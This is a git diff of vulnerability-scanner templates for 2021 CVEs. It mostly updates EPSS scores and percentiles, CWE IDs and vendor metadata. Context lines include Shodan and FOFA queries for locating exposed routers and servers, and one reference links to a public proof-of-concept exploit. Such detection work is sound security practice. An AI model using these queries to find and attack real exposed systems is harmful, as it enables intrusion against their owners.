b/http/cves/2021/CVE-2021-20090.yaml @@ -16,8 +16,9 @@ info: cvss-score: 9.8 cve-id: CVE-2021-20090 cwe-id: CWE-22 - epss-score: 0.97395 + epss-score: 0.97441 cpe: cpe:2.3:o:buffalo:wsr-2533dhpl2-bk_firmware:*:*:*:*:*:*:*:* + epss-percentile: 0.99913 metadata: max-request: 1 vendor: buffalo diff --git a/http/cves/2021/CVE-2021-20091.yaml b/http/cves/2021/CVE-2021-20091.yaml index 017f3de2d0..4fe2e753aa 100644 --- a/http/cves/2021/CVE-2021-20091.yaml +++ b/http/cves/2021/CVE-2021-20091.yaml @@ -15,8 +15,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2021-20091 - epss-score: 0.00988 + epss-score: 0.00814 cpe: cpe:2.3:o:buffalo:wsr-2533dhpl2-bk_firmware:*:*:*:*:*:*:*:* + epss-percentile: 0.79621 metadata: max-request: 2 vendor: buffalo diff --git a/http/cves/2021/CVE-2021-20092.yaml b/http/cves/2021/CVE-2021-20092.yaml index f77aa114ce..dc02072894 100644 --- a/http/cves/2021/CVE-2021-20092.yaml +++ b/http/cves/2021/CVE-2021-20092.yaml @@ -15,8 +15,9 @@ info: cvss-score: 7.5 cve-id: CVE-2021-20092 cwe-id: CWE-287 - epss-score: 0.01281 + epss-score: 0.01372 cpe: cpe:2.3:o:buffalo:wsr-2533dhpl2-bk_firmware:*:*:*:*:*:*:*:* + epss-percentile: 0.84606 metadata: max-request: 2 vendor: buffalo diff --git a/http/cves/2021/CVE-2021-20114.yaml b/http/cves/2021/CVE-2021-20114.yaml index 95c2a1bbc7..76c35a9adc 100644 --- a/http/cves/2021/CVE-2021-20114.yaml +++ b/http/cves/2021/CVE-2021-20114.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-425 epss-score: 0.0178 cpe: cpe:2.3:a:tecnick:tcexam:*:*:*:*:*:*:*:* + epss-percentile: 0.86493 metadata: max-request: 1 vendor: tecnick diff --git a/http/cves/2021/CVE-2021-20123.yaml b/http/cves/2021/CVE-2021-20123.yaml index 79e6d08cab..23c6ed4247 100644 --- a/http/cves/2021/CVE-2021-20123.yaml +++ b/http/cves/2021/CVE-2021-20123.yaml @@ -14,8 +14,9 @@ info: cvss-score: 7.5 cve-id: CVE-2021-20123 cwe-id: CWE-22 - epss-score: 0.02801 + epss-score: 0.05307 cpe: cpe:2.3:a:draytek:vigorconnect:1.6.0:beta3:*:*:*:*:*:* + epss-percentile: 0.92084 metadata: max-request: 2 verified: true diff --git a/http/cves/2021/CVE-2021-20124.yaml b/http/cves/2021/CVE-2021-20124.yaml index b853f8c6e3..9e1fe0540e 100644 --- a/http/cves/2021/CVE-2021-20124.yaml +++ b/http/cves/2021/CVE-2021-20124.yaml @@ -14,8 +14,9 @@ info: cvss-score: 7.5 cve-id: CVE-2021-20124 cwe-id: CWE-22 - epss-score: 0.01106 + epss-score: 0.02141 cpe: cpe:2.3:a:draytek:vigorconnect:1.6.0:beta3:*:*:*:*:*:* + epss-percentile: 0.87833 metadata: max-request: 2 verified: true diff --git a/http/cves/2021/CVE-2021-20137.yaml b/http/cves/2021/CVE-2021-20137.yaml index 580543df76..2349bb462f 100644 --- a/http/cves/2021/CVE-2021-20137.yaml +++ b/http/cves/2021/CVE-2021-20137.yaml @@ -14,8 +14,9 @@ info: cvss-score: 6.1 cve-id: CVE-2021-20137 cwe-id: CWE-79 - epss-score: 0.31136 + epss-score: 0.3285 cpe: cpe:2.3:o:gryphonconnect:gryphon_tower_firmware:*:*:*:*:*:*:*:* + epss-percentile: 0.96459 metadata: max-request: 1 vendor: gryphonconnect diff --git a/http/cves/2021/CVE-2021-20150.yaml b/http/cves/2021/CVE-2021-20150.yaml index 4a347f5477..81455435b1 100644 --- a/http/cves/2021/CVE-2021-20150.yaml +++ b/http/cves/2021/CVE-2021-20150.yaml @@ -13,8 +13,9 @@ info: cvss-score: 5.3 cve-id: CVE-2021-20150 cwe-id: CWE-306 - epss-score: 0.21132 + epss-score: 0.16176 cpe: cpe:2.3:o:trendnet:tew-827dru_firmware:2.08b01:*:*:*:*:*:*:* + epss-percentile: 0.95283 metadata: max-request: 1 shodan-query: http.html:"TEW-827DRU" diff --git a/http/cves/2021/CVE-2021-20158.yaml b/http/cves/2021/CVE-2021-20158.yaml index bb82b024da..dc8fd28d25 100644 --- a/http/cves/2021/CVE-2021-20158.yaml +++ b/http/cves/2021/CVE-2021-20158.yaml @@ -13,15 +13,15 @@ info: cvss-score: 9.8 cve-id: CVE-2021-20158 cwe-id: CWE-306 - epss-score: 0.01167 + epss-score: 0.01211 cpe: cpe:2.3:o:trendnet:tew-827dru_firmware:2.08b01:*:*:*:*:*:*:* + epss-percentile: 0.83527 metadata: max-request: 2 shodan-query: http.html:"TEW-827DRU" vendor: trendnet product: tew-827dru_firmware tags: disclosure,router,intrusive,tenable,cve,cve2021,trendnet - variables: password: "{{rand_base(6)}}" diff --git a/http/cves/2021/CVE-2021-20167.yaml b/http/cves/2021/CVE-2021-20167.yaml index c4a1646291..72554c56b8 100644 --- a/http/cves/2021/CVE-2021-20167.yaml +++ b/http/cves/2021/CVE-2021-20167.yaml @@ -15,8 +15,9 @@ info: cvss-score: 8 cve-id: CVE-2021-20167 cwe-id: CWE-77 - epss-score: 0.95513 + epss-score: 0.95111 cpe: cpe:2.3:o:netgear:rax43_firmware:1.0.3.96:*:*:*:*:*:*:* + epss-percentile: 0.99023 metadata: max-request: 1 vendor: netgear diff --git a/http/cves/2021/CVE-2021-20323.yaml b/http/cves/2021/CVE-2021-20323.yaml index 990436c5e5..ef9fedbb87 100644 --- a/http/cves/2021/CVE-2021-20323.yaml +++ b/http/cves/2021/CVE-2021-20323.yaml @@ -18,8 +18,9 @@ info: cvss-score: 6.1 cve-id: CVE-2021-20323 cwe-id: CWE-79 - epss-score: 0.0018 + epss-score: 0.00222 cpe: cpe:2.3:a:redhat:keycloak:*:*:*:*:*:*:*:* + epss-percentile: 0.59851 metadata: max-request: 4 shodan-query: html:"Keycloak" diff --git a/http/cves/2021/CVE-2021-20792.yaml b/http/cves/2021/CVE-2021-20792.yaml index 0246e6f6bf..b83b87d186 100644 --- a/http/cves/2021/CVE-2021-20792.yaml +++ b/http/cves/2021/CVE-2021-20792.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-79 epss-score: 0.002 cpe: cpe:2.3:a:expresstech:quiz_and_survey_master:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.57161 metadata: max-request: 2 framework: wordpress diff --git a/http/cves/2021/CVE-2021-20837.yaml b/http/cves/2021/CVE-2021-20837.yaml index b2db6836ca..77571974a0 100644 --- a/http/cves/2021/CVE-2021-20837.yaml +++ b/http/cves/2021/CVE-2021-20837.yaml @@ -16,8 +16,9 @@ info: cvss-score: 9.8 cve-id: CVE-2021-20837 cwe-id: CWE-78 - epss-score: 0.97185 + epss-score: 0.97158 cpe: cpe:2.3:a:sixapart:movable_type:*:*:*:*:premium:*:*:* + epss-percentile: 0.99701 metadata: max-request: 1 vendor: sixapart diff --git a/http/cves/2021/CVE-2021-21087.yaml b/http/cves/2021/CVE-2021-21087.yaml index 0af820cdc8..99bcc230ed 100644 --- a/http/cves/2021/CVE-2021-21087.yaml +++ b/http/cves/2021/CVE-2021-21087.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.00145 cpe: cpe:2.3:a:adobe:coldfusion:2016:-:*:*:*:*:*:* + epss-percentile: 0.49708 metadata: max-request: 7 shodan-query: http.component:"Adobe ColdFusion" @@ -36,6 +37,7 @@ http: - "{{BaseURL}}/cfmx/CFIDE/scripts/ajax/package/cfajax.js" stop-at-first-match: true + matchers-condition: and matchers: - type: regex diff --git a/http/cves/2021/CVE-2021-21234.yaml b/http/cves/2021/CVE-2021-21234.yaml index b7be8172ec..17b55dc513 100644 --- a/http/cves/2021/CVE-2021-21234.yaml +++ b/http/cves/2021/CVE-2021-21234.yaml @@ -17,8 +17,9 @@ info: cvss-score: 7.7 cve-id: CVE-2021-21234 cwe-id: CWE-22 - epss-score: 0.97093 + epss-score: 0.97064 cpe: cpe:2.3:a:spring-boot-actuator-logview_project:spring-boot-actuator-logview:*:*:*:*:*:*:*:* + epss-percentile: 0.99653 metadata: max-request: 4 vendor: spring-boot-actuator-logview_project diff --git a/http/cves/2021/CVE-2021-21287.yaml b/http/cves/2021/CVE-2021-21287.yaml index 79f2b56c5e..28f99a1c65 100644 --- a/http/cves/2021/CVE-2021-21287.yaml +++ b/http/cves/2021/CVE-2021-21287.yaml @@ -16,8 +16,9 @@ info: cvss-score: 7.7 cve-id: CVE-2021-21287 cwe-id: CWE-918 - epss-score: 0.9729 + epss-score: 0.97296 cpe: cpe:2.3:a:minio:minio:*:*:*:*:*:*:*:* + epss-percentile: 0.99792 metadata: max-request: 1 vendor: minio diff --git a/http/cves/2021/CVE-2021-21307.yaml b/http/cves/2021/CVE-2021-21307.yaml index 5e63083438..dbb3816a4b 100644 --- a/http/cves/2021/CVE-2021-21307.yaml +++ b/http/cves/2021/CVE-2021-21307.yaml @@ -17,8 +17,9 @@ info: cvss-score: 9.8 cve-id: CVE-2021-21307 cwe-id: CWE-862 - epss-score: 0.97319 + epss-score: 0.973 cpe: cpe:2.3:a:lucee:lucee_server:*:*:*:*:*:*:*:* + epss-percentile: 0.99795 metadata: max-request: 3 vendor: lucee diff --git a/http/cves/2021/CVE-2021-21311.yaml b/http/cves/2021/CVE-2021-21311.yaml index ca4b90a97c..c12f41757e 100644 --- a/http/cves/2021/CVE-2021-21311.yaml +++ b/http/cves/2021/CVE-2021-21311.yaml @@ -19,6 +19,7 @@ info: cwe-id: CWE-918 epss-score: 0.00795 cpe: cpe:2.3:a:adminer:adminer:*:*:*:*:*:*:*:* + epss-percentile: 0.79414 metadata: max-request: 6 fofa-query: app="Adminer" && body="4.7.8" diff --git a/http/cves/2021/CVE-2021-21315.yaml b/http/cves/2021/CVE-2021-21315.yaml index 0f213abfb5..837b1d4205 100644 --- a/http/cves/2021/CVE-2021-21315.yaml +++ b/http/cves/2021/CVE-2021-21315.yaml @@ -17,8 +17,9 @@ info: cvss-score: 7.8 cve-id: CVE-2021-21315 cwe-id: CWE-78 - epss-score: 0.97232 + epss-score: 0.97213 cpe: cpe:2.3:a:systeminformation:systeminformation:*:*:*:*:*:node.js:*:* + epss-percentile: 0.99738 metadata: max-request: 1 framework: node.js diff --git a/http/cves/2021/CVE-2021-21345.yaml b/http/cves/2021/CVE-2021-21345.yaml index 9f8abdcc81..6028c03e9b 100644 --- a/http/cves/2021/CVE-2021-21345.yaml +++ b/http/cves/2021/CVE-2021-21345.yaml @@ -18,8 +18,9 @@ info: cvss-score: 9.9 cve-id: CVE-2021-21345 cwe-id: CWE-78,CWE-502 - epss-score: 0.48389 + epss-score: 0.35598 cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* + epss-percentile: 0.96598 metadata: max-request: 1 vendor: xstream_project diff --git a/http/cves/2021/CVE-2021-21351.yaml b/http/cves/2021/CVE-2021-21351.yaml index 37afc2f3de..b7dff9e07f 100644 --- a/http/cves/2021/CVE-2021-21351.yaml +++ b/http/cves/2021/CVE-2021-21351.yaml @@ -18,8 +18,9 @@ info: cvss-score: 9.1 cve-id: CVE-2021-21351 cwe-id: CWE-434 - epss-score: 0.9556 + epss-score: 0.9411 cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* + epss-percentile: 0.9883 metadata: max-request: 1 vendor: xstream_project diff --git a/http/cves/2021/CVE-2021-21389.yaml b/http/cves/2021/CVE-2021-21389.yaml index 0973520b1c..c3474c74ac 100644 --- a/http/cves/2021/CVE-2021-21389.yaml +++ b/http/cves/2021/CVE-2021-21389.yaml @@ -19,6 +19,7 @@ info: cwe-id: CWE-863 epss-score: 0.77888 cpe: cpe:2.3:a:buddypress:buddypress:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.97815 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2021/CVE-2021-21402.yaml b/http/cves/2021/CVE-2021-21402.yaml index 083e31476d..79f7fa8e6a 100644 --- a/http/cves/2021/CVE-2021-21402.yaml +++ b/http/cves/2021/CVE-2021-21402.yaml @@ -18,8 +18,9 @@ info: cvss-score: 6.5 cve-id: CVE-2021-21402 cwe-id: CWE-22 - epss-score: 0.25761 + epss-score: 0.23511 cpe: cpe:2.3:a:jellyfin:jellyfin:*:*:*:*:*:*:*:* + epss-percentile: 0.95936 metadata: max-request: 2 fofa-query: title="Jellyfin" || body="http://jellyfin.media" diff --git a/http/cves/2021/CVE-2021-21479.yaml b/http/cves/2021/CVE-2021-21479.yaml index cbd0628ce8..0c87580294 100644 --- a/http/cves/2021/CVE-2021-21479.yaml +++ b/http/cves/2021/CVE-2021-21479.yaml @@ -16,8 +16,9 @@ info: cvss-score: 9.1 cve-id: CVE-2021-21479 cwe-id: CWE-74 - epss-score: 0.00323 + epss-score: 0.00281 cpe: cpe:2.3:a:sap:scimono:*:*:*:*:*:*:*:* + epss-percentile: 0.64444 metadata: max-request: 1 vendor: sap diff --git a/http/cves/2021/CVE-2021-21745.yaml b/http/cves/2021/CVE-2021-21745.yaml index 3319872782..4c83540473 100644 --- a/http/cves/2021/CVE-2021-21745.yaml +++ b/http/cves/2021/CVE-2021-21745.yaml @@ -16,8 +16,9 @@ info: cvss-score: 4.3 cve-id: CVE-2021-21745 cwe-id: CWE-352 - epss-score: 0.44955 + epss-score: 0.23979 cpe: cpe:2.3:o:zte:mf971r_firmware:v1.0.0b05:*:*:*:*:*:*:* + epss-percentile: 0.95971 metadata: max-request: 1 vendor: zte diff --git a/http/cves/2021/CVE-2021-21799.yaml b/http/cves/2021/CVE-2021-21799.yaml index d78f748fde..b8c5f0acca 100644 --- a/http/cves/2021/CVE-2021-21799.yaml +++ b/http/cves/2021/CVE-2021-21799.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-79 epss-score: 0.85976 cpe: cpe:2.3:a:advantech:r-seenet:2.4.12:*:*:*:*:*:*:* + epss-percentile: 0.98127 metadata: max-request: 1 shodan-query: http.html:"R-SeeNet" diff --git a/http/cves/2021/CVE-2021-21800.yaml b/http/cves/2021/CVE-2021-21800.yaml index 730568a230..229dddf4f4 100644 --- a/http/cves/2021/CVE-2021-21800.yaml +++ b/http/cves/2021/CVE-2021-21800.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-79 epss-score: 0.85976 cpe: cpe:2.3:a:advantech:r-seenet:2.4.12:*:*:*:*:*:*:* + epss-percentile: 0.98127 metadata: max-request: 1 shodan-query: http.html:"R-SeeNet" diff --git a/http/cves/2021/CVE-2021-21801.yaml b/http/cves/2021/CVE-2021-21801.yaml index 580549c638..0cce3ed62a 100644 --- a/http/cves/2021/CVE-2021-21801.yaml +++ b/http/cves/2021/CVE-2021-21801.yaml @@ -15,6 +15,7 @@ info: cwe-id: CWE-79 epss-score: 0.85976 cpe: cpe:2.3:a:advantech:r-seenet:2.4.12:*:*:*:*:*:*:* + epss-percentile: 0.98127 metadata: max-request: 1 vendor: advantech diff --git a/http/cves/2021/CVE-2021-21802.yaml b/http/cves/2021/CVE-2021-21802.yaml index a54dfb7c55..c7baa7093b 100644 --- a/http/cves/2021/CVE-2021-21802.yaml +++ b/http/cves/2021/CVE-2021-21802.yaml @@ -15,6 +15,7 @@ info: cwe-id: CWE-79 epss-score: 0.85976 cpe: cpe:2.3:a:advantech:r-seenet:2.4.12:*:*:*:*:*:*:* + epss-percentile: 0.98127 metadata: max-request: 1 vendor: advantech diff --git a/http/cves/2021/CVE-2021-21803.yaml b/http/cves/2021/CVE-2021-21803.yaml index e1244f84a4..40518e646f 100644 --- a/http/cves/2021/CVE-2021-21803.yaml +++ b/http/cves/2021/CVE-2021-21803.yaml @@ -15,6 +15,7 @@ info: cwe-id: CWE-79 epss-score: 0.85976 cpe: cpe:2.3:a:advantech:r-seenet:2.4.12:*:*:*:*:*:*:* + epss-percentile: 0.98127 metadata: max-request: 1 vendor: advantech diff --git a/http/cves/2021/CVE-2021-21805.yaml b/http/cves/2021/CVE-2021-21805.yaml index 2be64f7b5f..740f49ddee 100644 --- a/http/cves/2021/CVE-2021-21805.yaml +++ b/http/cves/2021/CVE-2021-21805.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-78 epss-score: 0.97394 cpe: cpe:2.3:a:advantech:r-seenet:2.4.12:*:*:*:*:*:*:* + epss-percentile: 0.99872 metadata: max-request: 1 shodan-query: http.html:"R-SeeNet" diff --git a/http/cves/2021/CVE-2021-21816.yaml b/http/cves/2021/CVE-2021-21816.yaml index 1ce1eddd41..f01e3e4975 100644 --- a/http/cves/2021/CVE-2021-21816.yaml +++ b/http/cves/2021/CVE-2021-21816.yaml @@ -13,8 +13,9 @@ info: cvss-score: 4.3 cve-id: CVE-2021-21816 cwe-id: CWE-200 - epss-score: 0.00337 + epss-score: 0.00255 cpe: cpe:2.3:o:dlink:dir-3040_firmware:1.13b03:*:*:*:*:*:*:* + epss-percentile: 0.62674 metadata: max-request: 1 vendor: dlink diff --git a/http/cves/2021/CVE-2021-21881.yaml b/http/cves/2021/CVE-2021-21881.yaml index 7244076b9d..e3f45e4d9d 100644 --- a/http/cves/2021/CVE-2021-21881.yaml +++ b/http/cves/2021/CVE-2021-21881.yaml @@ -13,8 +13,9 @@ info: cvss-score: 9.9 cve-id: CVE-2021-21881 cwe-id: CWE-78 - epss-score: 0.97108 + epss-score: 0.97105 cpe: cpe:2.3:o:lantronix:premierwave_2050_firmware:8.9.0.0:r4:*:*:*:*:*:* + epss-percentile: 0.99673 metadata: max-request: 2 vendor: lantronix diff --git a/http/cves/2021/CVE-2021-21972.yaml b/http/cves/2021/CVE-2021-21972.yaml index 49c258599e..5f1c2153e3 100644 --- a/http/cves/2021/CVE-2021-21972.yaml +++ b/http/cves/2021/CVE-2021-21972.yaml @@ -15,8 +15,9 @@ info: cvss-score: 9.8 cve-id: CVE-2021-21972 cwe-id: CWE-22 - epss-score: 0.97386 + epss-score: 0.97432 cpe: cpe:2.3:a:vmware:cloud_foundation:*:*:*:*:*:*:*:* + epss-percentile: 0.99903 metadata: max-request: 1 vendor: vmware diff --git a/http/cves/2021/CVE-2021-21973.yaml b/http/cves/2021/CVE-2021-21973.yaml index 02963f5aa9..f1465778c7 100644 --- a/http/cves/2021/CVE-2021-21973.yaml +++ b/http/cves/2021/CVE-2021-21973.yaml @@ -15,8 +15,9 @@ info: cvss-score: 5.3 cve-id: CVE-2021-21973 cwe-id: CWE-918 - epss-score: 0.18619 + epss-score: 0.17148 cpe: cpe:2.3:a:vmware:cloud_foundation:*:*:*:*:*:*:*:* + epss-percentile: 0.95393 metadata: max-request: 1 vendor: vmware diff --git a/http/cves/2021/CVE-2021-21975.yaml b/http/cves/2021/CVE-2021-21975.yaml index 3c3e010e82..53f47e5701 100644 --- a/http/cves/2021/CVE-2021-21975.yaml +++ b/http/cves/2021/CVE-2021-21975.yaml @@ -14,8 +14,9 @@ info: cvss-score: 7.5 cve-id: CVE-2021-21975 cwe-id: CWE-918 - epss-score: 0.97441 + epss-score: 0.97437 cpe: cpe:2.3:a:vmware:cloud_foundation:3.0:*:*:*:*:*:*:* + epss-percentile: 0.9991 metadata: max-request: 1 vendor: vmware diff --git a/http/cves/2021/CVE-2021-21978.yaml b/http/cves/2021/CVE-2021-21978.yaml index 39fb89990e..7edb67e2ed 100644 --- a/http/cves/2021/CVE-2021-21978.yaml +++ b/http/cves/2021/CVE-2021-21978.yaml @@ -17,9 +17,10 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-21978 - cwe-id: CWE-434 - epss-score: 0.9748 + cwe-id: CWE-20 + epss-score: 0.97519 cpe: cpe:2.3:a:vmware:view_planner:*:*:*:*:*:*:*:* + epss-percentile: 0.99976 metadata: max-request: 1 vendor: vmware diff --git a/http/cves/2021/CVE-2021-21985.yaml b/http/cves/2021/CVE-2021-21985.yaml index 13364b60e7..f751101ccb 100644 --- a/http/cves/2021/CVE-2021-21985.yaml +++ b/http/cves/2021/CVE-2021-21985.yaml @@ -16,8 +16,9 @@ info: cvss-score: 9.8 cve-id: CVE-2021-21985 cwe-id: CWE-20 - epss-score: 0.9746 + epss-score: 0.97454 cpe: cpe:2.3:a:vmware:vcenter_server:6.5:-:*:*:*:*:*:* + epss-percentile: 0.99926 metadata: max-request: 1 vendor: vmware diff --git a/http/cves/2021/CVE-2021-22005.yaml b/http/cves/2021/CVE-2021-22005.yaml index df4e79d889..42e85e49cf 100644 --- a/http/cves/2021/CVE-2021-22005.yaml +++ b/http/cves/2021/CVE-2021-22005.yaml @@ -14,9 +14,10 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-22005 - cwe-id: CWE-434 - epss-score: 0.9731 + cwe-id: CWE-22 + epss-score: 0.97237 cpe: cpe:2.3:a:vmware:cloud_foundation:*:*:*:*:*:*:*:* + epss-percentile: 0.99755 metadata: max-request: 2 vendor: vmware diff --git a/http/cves/2021/CVE-2021-22053.yaml b/http/cves/2021/CVE-2021-22053.yaml index 5d2179fd49..37b22e6061 100644 --- a/http/cves/2021/CVE-2021-22053.yaml +++ b/http/cves/2021/CVE-2021-22053.yaml @@ -15,8 +15,9 @@ info: cvss-score: 8.8 cve-id: CVE-2021-22053 cwe-id: CWE-94 - cpe: cpe:2.3:a:vmware:spring_cloud_netflix:*:*:*:*:*:*:*:* epss-score: 0.7163 + cpe: cpe:2.3:a:vmware:spring_cloud_netflix:*:*:*:*:*:*:*:* + epss-percentile: 0.97629 metadata: max-request: 2 product: spring_cloud_netflix diff --git a/http/cves/2021/CVE-2021-22054.yaml b/http/cves/2021/CVE-2021-22054.yaml index f9af2c9bc6..a3c97613f3 100644 --- a/http/cves/2021/CVE-2021-22054.yaml +++ b/http/cves/2021/CVE-2021-22054.yaml @@ -14,8 +14,9 @@ info: cvss-score: 7.5 cve-id: CVE-2021-22054 cwe-id: CWE-918 - epss-score: 0.83683 + epss-score: 0.76256 cpe: cpe:2.3:a:vmware:workspace_one_uem_console:*:*:*:*:*:*:*:* + epss-percentile: 0.97769 metadata: max-request: 1 fofa-query: banner="/AirWatch/default.aspx" || header="/AirWatch/default.aspx" diff --git a/http/cves/2021/CVE-2021-22122.yaml b/http/cves/2021/CVE-2021-22122.yaml index eb08132459..8a2c656674 100644 --- a/http/cves/2021/CVE-2021-22122.yaml +++ b/http/cves/2021/CVE-2021-22122.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-79 epss-score: 0.11206 cpe: cpe:2.3:a:fortinet:fortiweb:*:*:*:*:*:*:*:* + epss-percentile: 0.94436 metadata: max-request: 2 vendor: fortinet diff --git a/http/cves/2021/CVE-2021-22145.yaml b/http/cves/2021/CVE-2021-22145.yaml index 208cd03eb0..6891d25a16 100644 --- a/http/cves/2021/CVE-2021-22145.yaml +++ b/http/cves/2021/CVE-2021-22145.yaml @@ -16,8 +16,9 @@ info: cvss-score: 6.5 cve-id: CVE-2021-22145 cwe-id: CWE-209 - epss-score: 0.34493 + epss-score: 0.36411 cpe: cpe:2.3:a:elastic:elasticsearch:*:*:*:*:*:*:*:* + epss-percentile: 0.96626 metadata: max-request: 1 vendor: elastic diff --git a/http/cves/2021/CVE-2021-22205.yaml b/http/cves/2021/CVE-2021-22205.yaml index 6d5cdaf793..a5fa65008b 100644 --- a/http/cves/2021/CVE-2021-22205.yaml +++ b/http/cves/2021/CVE-2021-22205.yaml @@ -18,8 +18,9 @@ info: cvss-score: 10 cve-id: CVE-2021-22205 cwe-id: CWE-94 - epss-score: 0.97427 + epss-score: 0.97419 cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:* + epss-percentile: 0.9989 metadata: max-request: 1 shodan-query: http.title:"GitLab" diff --git a/http/cves/2021/CVE-2021-22214.yaml b/http/cves/2021/CVE-2021-22214.yaml index f727ef30ad..daff573204 100644 --- a/http/cves/2021/CVE-2021-22214.yaml +++ b/http/cves/2021/CVE-2021-22214.yaml @@ -20,8 +20,9 @@ info: cvss-score: 8.6 cve-id: CVE-2021-22214 cwe-id: CWE-918 - epss-score: 0.17173 + epss-score: 0.12503 cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:*:*:*:* + epss-percentile: 0.94709 metadata: max-request: 1 shodan-query: http.title:"GitLab" diff --git a/http/cves/2021/CVE-2021-22502.yaml b/http/cves/2021/CVE-2021-22502.yaml index 8b6a3bf0b2..b7ae2e4e9c 100644 --- a/http/cves/2021/CVE-2021-22502.yaml +++ b/http/cves/2021/CVE-2021-22502.yaml @@ -17,8 +17,9 @@ info: cvss-score: 9.8 cve-id: CVE-2021-22502 cwe-id: CWE-78 - epss-score: 0.97447 + epss-score: 0.9745 cpe: cpe:2.3:a:microfocus:operation_bridge_reporter:10.40:*:*:*:*:*:*:* + epss-percentile: 0.9992 metadata: max-request: 1 vendor: microfocus diff --git a/http/cves/2021/CVE-2021-22707.yaml b/http/cves/2021/CVE-2021-22707.yaml index 01aba9db23..0d13ecab7e 100644 --- a/http/cves/2021/CVE-2021-22707.yaml +++ b/http/cves/2021/CVE-2021-22707.yaml @@ -9,13 +9,22 @@ info: reference: - https://codeberg.org/AmenoCat/CVE-2021-22707-PoC/raw/branch/main/exploit.sh - https://nvd.nist.gov/vuln/detail/CVE-2021-22707 + - http://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2021-194-06 classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 cve-id: CVE-2021-22707 + cwe-id: CWE-798 + epss-score: 0.3812 + cpe: cpe:2.3:o:schneider-electric:evlink_city_evc1s22p4_firmware:*:*:*:*:*:*:*:* + epss-percentile: 0.96713 metadata: max-request: 1 verified: true shodan-query: title:"EVSE web interface" fofa-query: title="EVSE web interface" + vendor: schneider-electric + product: evlink_city_evc1s22p4_firmware tags: cve,cve2021,evlink,auth-bypass http: @@ -29,6 +38,7 @@ http: host-redirects: true max-redirects: 2 cookie-reuse: true + matchers-condition: and matchers: - type: word diff --git a/http/cves/2021/CVE-2021-22873.yaml b/http/cves/2021/CVE-2021-22873.yaml index 871a526f21..b54257f575 100644 --- a/http/cves/2021/CVE-2021-22873.yaml +++ b/http/cves/2021/CVE-2021-22873.yaml @@ -16,8 +16,9 @@ info: cvss-score: 6.1 cve-id: CVE-2021-22873 cwe-id: CWE-601 - epss-score: 0.00717 + epss-score: 0.00867 cpe: cpe:2.3:a:revive-adserver:revive_adserver:*:*:*:*:*:*:*:* + epss-percentile: 0.80246 metadata: max-request: 6 shodan-query: http.favicon.hash:106844876 diff --git a/http/cves/2021/CVE-2021-22911.yaml b/http/cves/2021/CVE-2021-22911.yaml index 406e7a8608..04bbac2cb2 100644 --- a/http/cves/2021/CVE-2021-22911.yaml +++ b/http/cves/2021/CVE-2021-22911.yaml @@ -17,8 +17,9 @@ info: cvss-score: 9.8 cve-id: CVE-2021-22911 cwe-id: CWE-75,NVD-CWE-Other - epss-score: 0.95173 + epss-score: 0.94897 cpe: cpe:2.3:a:rocket.chat:rocket.chat:3.11.0:-:*:*:*:*:*:* + epss-percentile: 0.98981 metadata: max-request: 1 shodan-query: http.title:"Rocket.Chat" diff --git a/http/cves/2021/CVE-2021-22986.yaml b/http/cves/2021/CVE-2021-22986.yaml index 97c40b1a6c..c3eff47dfa 100644 --- a/http/cves/2021/CVE-2021-22986.yaml +++ b/http/cves/2021/CVE-2021-22986.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-918 epss-score: 0.97452 cpe: cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:* + epss-percentile: 0.99923 metadata: max-request: 2 vendor: f5 diff --git a/http/cves/2021/CVE-2021-23241.yaml b/http/cves/2021/CVE-2021-23241.yaml index a4b37708b8..023b22cde2 100644 --- a/http/cves/2021/CVE-2021-23241.yaml +++ b/http/cves/2021/CVE-2021-23241.yaml @@ -15,8 +15,9 @@ info: cvss-score: 5.3 cve-id: CVE-2021-23241 cwe-id: CWE-22 - epss-score: 0.00265 + epss-score: 0.00321 cpe: cpe:2.3:o:mercusys:mercury_x18g_firmware:1.0.5:*:*:*:*:*:*:* + epss-percentile: 0.66807 metadata: max-request: 1 vendor: mercusys diff --git a/http/cves/2021/CVE-2021-24145.yaml b/http/cves/2021/CVE-2021-24145.yaml index e7d034c81f..41b3bf8fbe 100644 --- a/http/cves/2021/CVE-2021-24145.yaml +++ b/http/cves/2021/CVE-2021-24145.yaml @@ -17,8 +17,9 @@ info: cvss-score: 7.2 cve-id: CVE-2021-24145 cwe-id: CWE-434 - epss-score: 0.93699 + epss-score: 0.93112 cpe: cpe:2.3:a:webnus:modern_events_calendar_lite:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.98681 metadata: max-request: 3 verified: true diff --git a/http/cves/2021/CVE-2021-24146.yaml b/http/cves/2021/CVE-2021-24146.yaml index b975973f29..edb7a51de9 100644 --- a/http/cves/2021/CVE-2021-24146.yaml +++ b/http/cves/2021/CVE-2021-24146.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-862,CWE-284 epss-score: 0.02392 cpe: cpe:2.3:a:webnus:modern_events_calendar_lite:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.88487 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2021/CVE-2021-24150.yaml 